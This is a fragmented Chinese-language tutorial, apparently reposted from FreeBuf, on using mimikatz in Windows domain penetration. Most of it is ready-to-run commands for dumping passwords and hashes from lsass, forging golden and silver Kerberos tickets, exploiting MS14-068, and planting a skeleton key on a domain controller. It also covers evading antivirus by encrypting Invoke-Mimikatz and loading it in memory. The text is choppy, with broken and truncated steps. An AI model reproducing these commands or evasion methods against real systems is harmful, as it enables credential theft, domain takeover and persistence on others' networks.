答:mimikatz是法国安全研究员Benjamin Delpy在GitHub开源的内网工具(GitHub下载地址)可用来做一些关于Win内网安全的渗透实验;它在内网渗透中它可以从lsass.exe进程中提取明文密码、哈希值、PIN码和Kerberos票据,因此很多人称之为密码抓取神器;与此同时它还可以执行传递哈希值、传递票据、建立票据、伪造域管理凭证令牌等诸多功能等
答:提取目标主机的Hash值的工具有不少,eg: GetHash
、gsecdump
、PwDump
、Ntdsutil
....但是mimikatz依然是大多数人的选择
答:经常搭配mimikatz的工具有很多;eg: CS
、MSF
、oclHashcat
、lC5
、Ophcrak
、John the Ripper
....其中大部分是Hash破解工具(其中MSF是自带mimikatz的)
1、在普通用户权限下查看提取的Hash 2、获得域控权限 3、通过mimikatz导出该文件的Hash 4、维持域控权限
1.获取登录会话信息(包含了用户密码的加密后密文) 2.提取加密密钥的值 3.调用Windows中的BCryptDecrypt函数解密
Icon Group
中的100里面打开;然后点击操作中的替换图标,最后修改名字就行了。Out-EncryptedScript
这个万能的加密脚本就是其中之一,它会将解密的内容加载到内存非常方便。Invoke-Mimikatz
再做一次Out-EncryptedScript
加密(这里有人可能会问为啥是Invoke-Mimikatz
,众所周知mimikatz被杀的死死的,所以大家都会开发一定的免杀方法,而"脚本小子"就可以站在巨人的的肩膀上进行免杀操作,大大方便了免杀的构造,同时也大幅度提升了免杀的成功率);但是这个脚本长时间没有更新,所以不建议大家使用,这里仅仅是一个思路,供大家参考。Out-EncryptedScript .\Invoke-Mimikatz.ps1 password salty
.ps1
脚本放在目标机上,执行命令就可以了[String] $cmd = Get-Content .\evil.ps1
Invoke-Expression $cmd
$decrypted = de password salt
Invoke-Expression $decrypted
Invoke-Mimikatz
mimiktz.exe
转化为字符串,然后嵌入到Invoke-ReflectivePEInjection.ps1
脚本中直接执行powershell import-module .\ToString.ps1
.\ToString .\mimikatz.exe >>1.txt
#获取权限
privilege::debug
#抓取密码
sekurlsa::logonpasswords
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > 1.txt
#删除所有的票据
klist purge
#查看域控的C盘
dir \WIN-9JJK4CNGD41.cyh.com\c$
mimikatz.exe "kerberos::golden /user:test /domain:whoami查看的域名.com /sid:导出文本中Domain的值 /krbtgt:导出的Hash值 /ptt" exit
(1)通过mimikatz获取内存口令 privilege::debug
sekurlsa::logonpasswords(2)通过mimikatz得到内存文件获取口令
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full(3)通过powershell远程命令mimikatz获取内存口令(参考方案二)
(4)通过控制lsass.exe找到ASM文件并导出为.dmp文件,传入攻击端利用mimikatz进行口令读取
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > 1.txt
mimikatz.exe "kerberos::golden /user:用户名 /domain:目标的域名 /sid:导出文本中Domain的值 /target:域的地址 /service:需要访问的服务 /rc4:Hash值 /ptt" exit
klist purge
命令清除票据;后通过下列命令获取伪造的证书ms14-068.exe -u 普通域用户名 -p 普通域用户的密码 -s 用户的SID -d 域的地址
mimikatz.exe "kerberos::ptc 目标域主机域名" exit
#通过钥匙达到任意用户登陆域控的目的
privilege::debug
misc::skeleton
net use \\获得的misc的值 mimikatz /user:test
本次的技术分享就到此为止了,感谢大家的阅读希望对大家mimikatz的学习有所帮助;因为篇幅所限还有部分,无法和大家深入探讨,不过我会补充的!笔者还处于小白阶段,难免有疏漏,欢迎大家批评指正!
本文作者:面包and牛奶,转载于格物安全原文地址:https://www.freebuf.com/articles/database/334512.html
好文推荐